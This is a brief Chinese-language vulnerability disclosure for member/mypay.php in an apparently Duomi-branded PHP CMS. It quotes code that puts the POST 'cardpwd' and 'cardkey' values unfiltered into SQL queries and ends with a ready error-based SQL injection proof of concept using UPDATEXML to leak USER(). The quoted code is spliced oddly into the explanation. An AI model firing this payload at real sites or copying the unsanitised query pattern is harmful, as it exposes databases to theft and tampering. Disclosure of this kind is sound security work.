漏洞文件member/mypay.php(14-40行)
if(empty($_SESSION['duomi_user_id'])){
showMsg("请先登录","login.php");
exit();
}
elseif($dm=='mypay'){
$key=$_POST['cardkey'];
if($key==""){showMsg("请输入充值卡号","-1");exit;}
$pwd=$_POST['cardpwd'];
if($pwd==""){showMsg("请输入充值卡密码","-1");exit;}
$sqlt="SELECT * FROM duomi_card where ckey='$key'";
$sqlt="SELECT * FROM duomi_card where cpwd='$pwd'";
$row1 = $dsql->GetOne($sqlt);
if(!is_array($row1) OR $row1['status']<>0){
showMsg("充值卡信息有误","-1");exit;
}else{
$uname=$_SESSION['duomi_user_name'];
$points=$row1['climit'];
$dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE ckey='$key'");
$dsql->executeNoneQuery("UPDATE duomi_card SET usetime=NOW(),uname='$uname',status='1' WHERE cpwd='$pwd'");
$dsql->executeNoneQuery("UPDATE duomi_member SET points=points+$points WHERE username='$uname'");
showMsg("恭喜!充值成功!","mypay.php");exit;
}
}
else
{此处的”cardpwd”变量没有进行过滤就以POST提交方式传入了数据库造成注入。 构造POC如下(注意此处需要注册用户并且登陆详情请看该文件1-17行):
http://localhost/member/mypay.php?dm=mypay POST:cardpwd=-1' AND (UPDATEXML(1,CONCAT(0x7e,(USER()),0x7e),1)) and '1'='1
